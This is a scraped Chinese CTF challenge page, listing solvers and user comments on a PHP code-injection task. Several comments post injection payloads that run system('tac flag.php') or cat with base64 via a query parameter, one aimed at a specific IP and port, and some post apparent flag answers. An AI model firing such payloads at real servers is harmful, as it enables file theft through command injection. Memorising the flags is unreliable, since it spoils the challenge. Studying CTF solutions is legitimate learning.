评分(10)
解题动态
Tim.Drake 攻破了该题 1小时前
语默人 攻破了该题 1小时前
frozenfish0x 攻破了该题 8小时前
2212994366 攻破了该题 14小时前
Dayssss 攻破了该题 14小时前
卡面来打123 攻破了该题 1天前
小狗喵喵喵 攻破了该题 1天前
yangyy 攻破了该题 1天前
hdcc1 攻破了该题 1天前
xiaoxiaojiangshi 攻破了该题 1天前
YanC1e 攻破了该题 1天前
假面骑士佟以冬 攻破了该题 1天前
K-423 攻破了该题 2天前
rourou 攻破了该题 2天前
zzxmxlmz123 攻破了该题 2天前
爆汁酸菜鱼 攻破了该题 3天前
bak3l1 攻破了该题 3天前
Arno_Zoffy 攻破了该题 3天前
Newdap 攻破了该题 3天前
评论
HK1ng 10月前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
一个姓⎝李⎠的师傅~ 5月前
举报
@Gargantua 因为浏览器遇到 <?php 这种特殊非 html 标准标签时,会触发浏览器自己的容错机制,把 php 代码字符串用灰色字符保留下来再源码中,但是不会当做字符串显示在浏览器上,更不会执行!
Gargantua 10月前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 10月前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'
650907784qqcom 10月前
举报
flag{***}
flag你在哪>︿< 11月前
举报
flag{*********}
八一卜kod 11月前
举报
Too Young Too Simple
evira 1年前
举报
温馨提示(但不是正解):这个题可以尝试一下用菜刀去shell
BaiBaiWin 1年前
举报
http://114.67.175.224:16319/?hello=system('tac flag.php')
1215125613 1年前
举报
flag{1e6d67d7cec2d7d4c373db2605f5f4a1}
Wang_Micro 1年前
举报
flag{771f65b0a99e6ebb383759a6d4e34c8a}
Rmgcc 1年前
举报
?hello=system('tac flag.php')